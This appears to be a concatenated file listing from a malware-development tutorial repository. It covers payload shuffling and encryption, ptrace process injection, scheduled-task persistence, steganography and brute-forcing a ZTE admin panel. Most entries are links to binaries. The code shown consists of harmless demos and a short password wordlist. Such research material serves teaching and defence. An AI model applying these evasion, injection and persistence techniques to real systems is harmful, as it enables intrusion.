https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-16-linux-hacking-2/hack -------------------------------------------------------------------------------- /2024-09-16-linux-hacking-2/hack2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-16-linux-hacking-2/hack2 -------------------------------------------------------------------------------- /2024-09-16-linux-hacking-2/hack3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-16-linux-hacking-2/hack3 -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 43. Simple C example 2 | 3 | Malware development trick - part 43. Shuffle malicious payload. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/09/30/malware-trick-43.html](https://cocomelonc.github.io/malware/2024/09/30/malware-trick-43.html) -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/bin2data.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | ## encrypting 4 | def bin2data(data): 5 | # data = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in data) + ' };' 6 | data = '{ 0x' + ', 0x'.join(hex(x)[2:] for x in data) + ' };' 7 | print (data) 8 | return data 9 | 10 | if __name__ == "__main__": 11 | # key for encrypt/decrypt 12 | parser = argparse.ArgumentParser() 13 | parser.add_argument('-f','--file', required = True, help = "target file") 14 | args = vars(parser.parse_args()) 15 | target_file = args['file'] 16 | with open(target_file, 'rb') as f: 17 | data = f.read() 18 | if data: 19 | bin2data(data) 20 | -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/deshuffled.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/deshuffled.bin -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/hack.exe -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/hack2.exe -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/hack3.exe -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/meow.bin -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/shuffled.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/shuffled.bin -------------------------------------------------------------------------------- /2024-10-20-malware-cryptography-33/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 33. Simple C example 2 | 3 | Malware and Cryptography 33: Lucifer payload encryption. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html](https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html) -------------------------------------------------------------------------------- /2024-10-20-malware-cryptography-33/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-10-20-malware-cryptography-33/hack -------------------------------------------------------------------------------- /2024-10-20-malware-cryptography-33/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-10-20-malware-cryptography-33/hack2.exe -------------------------------------------------------------------------------- /2024-11-10-malware-cryptography-34/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 34. Simple C example 2 | 3 | Malware and Cryptography 34: Encrypt/decrypt payload via DFC (Decorrelated Fast Cipher) algorithm. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/11/10/malware-cryptography-34.html](https://cocomelonc.github.io/malware/2024/11/10/malware-cryptography-34.html) -------------------------------------------------------------------------------- /2024-11-10-malware-cryptography-34/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-11-10-malware-cryptography-34/hack.exe -------------------------------------------------------------------------------- /2024-11-22-linux-hacking-3/README.md: -------------------------------------------------------------------------------- 1 | # Linux malware development 3. Simple C example 2 | Linux malware development - part 3. Process injection via ptrace. Simple C example. 3 | 4 | [https://cocomelonc.github.io/malware/2024/11/22/linux-hacking-3.html](https://cocomelonc.github.io/malware/2024/11/22/linux-hacking-3.html) -------------------------------------------------------------------------------- /2024-11-22-linux-hacking-3/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-11-22-linux-hacking-3/hack -------------------------------------------------------------------------------- /2024-11-22-linux-hacking-3/meow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-11-22-linux-hacking-3/meow -------------------------------------------------------------------------------- /2024-11-22-linux-hacking-3/meow.c: -------------------------------------------------------------------------------- 1 | /* 2 | * meow.c 3 | * simple "victim" process for injection testing 4 | * author @cocomelonc 5 | * https://cocomelonc.github.io/malware/2024/11/22/linux-hacking-3.html 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | 12 | int main() { 13 | printf("victim process started. PID: %d\n", getpid()); 14 | 15 | while (1) { 16 | printf("meow-meow... PID: %d\n", getpid()); 17 | sleep(5); // simulate periodic activity 18 | } 19 | 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /2024-11-30-malware-cryptography-35/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 35. Simple C example 2 | 3 | Malware and Cryptography 35: Encrypt/decrypt payload via Treyfer algorithm. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/11/30/malware-cryptography-35.html](https://cocomelonc.github.io/malware/2024/11/30/malware-cryptography-35.html) -------------------------------------------------------------------------------- /2024-11-30-malware-cryptography-35/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-11-30-malware-cryptography-35/hack.exe -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 36. Simple C example 2 | 3 | Malware and cryptography 36 - random sbox generation algorithms: Fisher-Yates shuffle. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/12/16/malware-cryptography-36.html](https://cocomelonc.github.io/malware/2024/12/16/malware-cryptography-36.html) -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-16-malware-cryptography-36/hack -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-16-malware-cryptography-36/hack2.exe -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/hack3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-16-malware-cryptography-36/hack3 -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/hack4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-16-malware-cryptography-36/hack4.exe -------------------------------------------------------------------------------- /2024-12-23-malware-cryptography-37/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 37. Simple C example 2 | 3 | Malware and cryptography 37 - Nonlinearity. Walsh Transform. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/12/23/malware-cryptography-37.html](https://cocomelonc.github.io/malware/2024/12/23/malware-cryptography-37.html) -------------------------------------------------------------------------------- /2024-12-23-malware-cryptography-37/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-23-malware-cryptography-37/hack -------------------------------------------------------------------------------- /2024-12-29-malware-cryptography-38/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-29-malware-cryptography-38/hack.exe -------------------------------------------------------------------------------- /2025-01-16-malware-cryptography-39/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-01-16-malware-cryptography-39/hack.exe -------------------------------------------------------------------------------- /2025-01-19-malware-tricks-44/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 44. Simple C example 2 | 3 | Malware development trick - part 44. Using legit GitHub API. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2025/01/19/malware-tricks-44.html](https://cocomelonc.github.io/malware/2025/01/19/malware-tricks-44.html) -------------------------------------------------------------------------------- /2025-01-19-malware-tricks-44/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-01-19-malware-tricks-44/hack.exe -------------------------------------------------------------------------------- /2025-02-01-linux-hacking-4/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-01-linux-hacking-4/hack -------------------------------------------------------------------------------- /2025-02-24-malware-trick-45/cat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-24-malware-trick-45/cat.png -------------------------------------------------------------------------------- /2025-02-24-malware-trick-45/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-24-malware-trick-45/hack -------------------------------------------------------------------------------- /2025-02-24-malware-trick-45/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-24-malware-trick-45/hack.exe -------------------------------------------------------------------------------- /2025-02-24-malware-trick-45/stego.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-24-malware-trick-45/stego.png -------------------------------------------------------------------------------- /2025-03-12-malware-pers-27/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * "malware" for Scheduled Task 4 | * persistence trick 5 | * author: @cocomelonc 6 | * https://cocomelonc.github.io/malware/2025/03/12/malware-pers-27.html 7 | */ 8 | #include 9 | #include 10 | 11 | int main() { 12 | FILE *file = fopen("C:\\Users\\zhzhu\\Desktop\\meow.txt", "w"); 13 | if (file) { 14 | fprintf(file, "=^..^= Meow-meow =^..^=!!\n"); 15 | fclose(file); 16 | } 17 | return 0; 18 | } -------------------------------------------------------------------------------- /2025-03-12-malware-pers-27/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-03-12-malware-pers-27/hack.exe -------------------------------------------------------------------------------- /2025-03-12-malware-pers-27/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-03-12-malware-pers-27/pers.exe -------------------------------------------------------------------------------- /2025-04-02-malware-cryptography-40/README.md: -------------------------------------------------------------------------------- 1 | # Malware and cryptography 40. Simple Nim example 2 | 3 | Malware and cryptography - part 40. Encrypt/decrypt payload via RC5. Simple Nim example. 4 | 5 | [https://cocomelonc.github.io/malware/2025/04/02/malware-cryptography-40.html](https://cocomelonc.github.io/malware/2025/04/02/malware-cryptography-40.html) -------------------------------------------------------------------------------- /2025-04-02-malware-cryptography-40/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-04-02-malware-cryptography-40/hack.exe -------------------------------------------------------------------------------- /2025-04-10-malware-cryptography-41/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-04-10-malware-cryptography-41/hack.exe -------------------------------------------------------------------------------- /2025-05-01-malware-tricks-46/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-01-malware-tricks-46/hack.exe -------------------------------------------------------------------------------- /2025-05-10-malware-tricks-47/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-10-malware-tricks-47/hack.exe -------------------------------------------------------------------------------- /2025-05-10-malware-tricks-47/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-10-malware-tricks-47/hack2.exe -------------------------------------------------------------------------------- /2025-05-10-malware-tricks-47/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-10-malware-tricks-47/hack3.exe -------------------------------------------------------------------------------- /2025-05-29-malware-cryptography-42/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-29-malware-cryptography-42/hack -------------------------------------------------------------------------------- /2025-05-29-malware-cryptography-42/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-29-malware-cryptography-42/hack2.exe -------------------------------------------------------------------------------- /2025-05-29-malware-cryptography-42/hack3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-29-malware-cryptography-42/hack3 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Meow-meow 2 | 3 | Results (ALL, even bad and unfinished ones) of my research on cybersecurity practical cases 4 | 5 | ![meow](./meow.png?raw=true) 6 | 7 | [https://cocomelonc.github.io/](https://cocomelonc.github.io/) 8 | 9 | My MD MZ book: [https://cocomelonc.github.io/book/2022/07/16/mybook.html](https://cocomelonc.github.io/book/2022/07/16/mybook.html) 10 | My Malware in the wild book: [https://cocomelonc.github.io/book/2023/12/13/malwild-book.html](https://cocomelonc.github.io/book/2023/12/13/malwild-book.html) 11 | Malware Development for Ethical Hackers by Packt book: [https://github.com/PacktPublishing/Malware-Development-for-Ethical-Hackers/](https://github.com/PacktPublishing/Malware-Development-for-Ethical-Hackers/) 12 | -------------------------------------------------------------------------------- /hvck/2022-12-01-malware-analysis-online/2022-02-23_14-48.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2022-12-01-malware-analysis-online/2022-02-23_14-48.png -------------------------------------------------------------------------------- /hvck/2022-12-01-malware-analysis-online/README.md: -------------------------------------------------------------------------------- 1 | # malware analysis: online tools 2 | 3 | Using VirusTotal and Malshare APIs 4 | 5 | ![meow](./2022-02-23_14-48.png?raw=true) 6 | -------------------------------------------------------------------------------- /hvck/2022-12-01-malware-analysis-online/locker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2022-12-01-malware-analysis-online/locker.exe -------------------------------------------------------------------------------- /hvck/2022-12-01-malware-analysis-online/shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2022-12-01-malware-analysis-online/shell.exe -------------------------------------------------------------------------------- /hvck/2023-01-01-rf-wifi/README.md: -------------------------------------------------------------------------------- 1 | # hack epson 2 | 3 | Pwn my vulnerable epson printer 4 | 5 | ![meow](./photo_2023-01-04_15-55-20.jpg?raw=true) 6 | -------------------------------------------------------------------------------- /hvck/2023-01-01-rf-wifi/photo_2023-01-04_15-55-20.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-01-01-rf-wifi/photo_2023-01-04_15-55-20.jpg -------------------------------------------------------------------------------- /hvck/2023-01-12-zte-crack/2023-01-15_05-56.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-01-12-zte-crack/2023-01-15_05-56.png -------------------------------------------------------------------------------- /hvck/2023-01-12-zte-crack/README.md: -------------------------------------------------------------------------------- 1 | # ZTE crack 2 | 3 | Brute ZTE admin panel 4 | 5 | ![meow](./2023-01-15_05-56.png?raw=true) 6 | -------------------------------------------------------------------------------- /hvck/2023-01-12-zte-crack/wordlist.txt: -------------------------------------------------------------------------------- 1 | admin 2 | 12345 3 | password 4 | Rh8Rw838@1 5 | pa$$w0rd 6 | qwerty 7 | 12345678 -------------------------------------------------------------------------------- /hvck/2023-03-04-binary-edge/2023-03-05_17-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-04-binary-edge/2023-03-05_17-08.png -------------------------------------------------------------------------------- /hvck/2023-03-04-binary-edge/README.md: -------------------------------------------------------------------------------- 1 | # BinaryEdge API 2 | 3 | Search via binary edge API 4 | 5 | ![meow](./2023-03-05_17-08.png?raw=true) 6 | -------------------------------------------------------------------------------- /hvck/2023-03-05-encshell/2023-03-08_20-56.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/2023-03-08_20-56.png -------------------------------------------------------------------------------- /hvck/2023-03-05-encshell/enc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/enc.exe -------------------------------------------------------------------------------- /hvck/2023-03-05-encshell/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/hack.exe -------------------------------------------------------------------------------- /hvck/2023-03-05-encshell/hack0.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/hack0.exe -------------------------------------------------------------------------------- /hvck/2023-03-05-encshell/meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-03-05-encshell/meow.bin -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/hack.exe -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/hack2.exe -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/hello.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/hello.exe -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/hello.nim: -------------------------------------------------------------------------------- 1 | echo "hello world!" -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-02.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-08.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-10.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-10_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-10_1.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-11.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-12.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-15.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-42.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-45.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-45.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-53.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-53.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-55.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-55.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/img/2024-06-01_12-56.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/img/2024-06-01_12-56.png -------------------------------------------------------------------------------- /hvck/2024-05-01-nim-injection/xorE.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2024-05-01-nim-injection/xorE.exe -------------------------------------------------------------------------------- /meow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/meow.png --------------------------------------------------------------------------------